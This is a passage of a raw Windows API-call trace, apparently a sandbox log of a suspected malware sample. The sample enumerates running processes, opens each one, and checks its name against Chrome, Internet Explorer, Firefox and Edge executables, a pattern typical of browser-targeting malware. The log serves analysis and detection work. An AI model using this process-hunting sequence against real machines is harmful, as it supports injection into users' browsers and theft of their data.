	[0240.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.021] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.021] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.022] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.022] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.023] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x81bc
	[0240.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.023] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.024] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.024] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.024] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.025] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.026] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x81c0
	[0240.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.026] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.026] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.026] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.027] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.027] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.028] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x81c4
	[0240.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.028] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.028] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.029] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.029] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.029] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0240.030] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x81c8
	[0240.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.030] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0240.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.031] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.031] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0240.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.031] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.031] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.032] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x81cc
	[0240.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.032] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.033] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.033] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.033] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.034] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0240.034] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x81d0
	[0240.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.035] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.035] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.035] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.036] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.036] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0240.037] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x81d4
	[0240.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.037] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0240.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.037] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.080] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0240.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.080] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.081] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.081] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x81d8
	[0240.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.082] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.082] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.082] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.083] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.083] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0240.084] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x81dc
	[0240.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.084] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0240.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.084] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.085] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0240.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.085] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.085] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0240.086] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x81e0
	[0240.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.086] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0240.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.087] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.087] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0240.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.087] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.088] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0240.088] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x81e4
	[0240.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.088] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0240.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.089] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.089] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0240.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.089] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.089] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0240.090] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x81e8
	[0240.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.090] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0240.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.091] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.091] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0240.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.091] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.092] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0240.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0240.093] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0240.093] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x81ec
	[0240.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.093] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0240.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.094] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.095] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0240.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.095] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.096] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0240.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x81f0
	[0240.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.097] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0240.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.097] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.098] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0240.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.098] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.098] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0240.099] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x81f4
	[0240.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.099] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0240.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.099] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.100] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0240.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.106] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.106] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0240.107] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x81f8
	[0240.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.107] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0240.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.108] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.108] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0240.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.109] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.109] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0240.110] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x81fc
	[0240.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.110] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0240.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.111] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.112] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0240.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.113] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.113] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0240.114] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x8200
	[0240.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.115] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0240.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.115] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.116] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0240.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.116] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.116] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0240.118] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x8204
	[0240.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.118] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0240.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.119] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.119] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0240.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.120] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.120] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0240.121] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x8208
	[0240.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.121] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0240.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.122] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.122] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0240.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.123] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.123] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0240.124] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x820c
	[0240.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.124] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0240.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.124] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.124] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0240.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.125] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.125] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0240.126] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x8210
	[0240.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.126] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0240.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.126] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.126] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0240.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.127] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.127] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0240.128] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x8214
	[0240.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.128] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0240.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.128] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.129] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0240.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.129] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.130] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0240.130] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x8218
	[0240.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.131] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0240.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.167] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.167] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0240.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
